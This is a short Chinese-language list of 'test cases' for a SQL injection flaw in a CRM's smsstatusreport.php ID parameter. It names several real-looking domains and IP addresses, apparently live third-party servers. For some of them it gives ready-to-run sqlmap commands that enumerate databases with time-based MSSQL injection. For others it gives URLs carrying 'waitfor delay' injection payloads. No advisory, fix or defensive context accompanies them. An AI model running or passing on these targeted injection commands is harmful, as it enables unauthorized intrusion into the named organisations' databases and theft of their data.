测试案例:
(1)http://crm.transn.net/background/smsstatusreport.php?ID=1
python sqlmap.py -u http://crm.transn.net/background/smsstatusreport.php?ID=1 --level 5 --risk 3 --dbms mssql --dbs --batch -v 1 --random-agent --technique=T
(2)http://crm7.abgroup.cn/background/smsstatusreport.php?ID=1
python sqlmap.py -u http://crm7.abgroup.cn/background/smsstatusreport.php?ID=1 --level 5 --risk 3 --dbms mssql --dbs --batch -v 3 --random-agent --technique=T
(3)http://218.94.82.23/background/smsstatusreport.php?ID=1
python sqlmap.py -u http://218.94.82.23/background/smsstatusreport.php?ID=1 --level 5 --risk 3 --dbms mssql --dbs --batch -v 3 --random-agent --technique=T
(4)http://220.113.5.194/background/smsstatusreport.php?ID=1
python sqlmap.py -u http://220.113.5.194/background/smsstatusreport.php?ID=1 --level 5 --risk 3 --dbms mssql --dbs --batch -v 3 --random-agent --technique=T
其他测试案例:(基于时间延迟注入)
http://218.84.134.162:8088/background/smsstatusreport.php?ID=1;waitfor%20delay%20'0:0:5'--
http://crm.pearmain.cn/background/smsstatusreport.php?ID=1;waitfor%20delay%20'0:0:5'--
http://218.108.86.226/background/smsstatusreport.php?ID=1;waitfor%20delay%20'0:0:5'--
http://yindajituan.gicp.net:8888/background/smsstatusreport.php?ID=1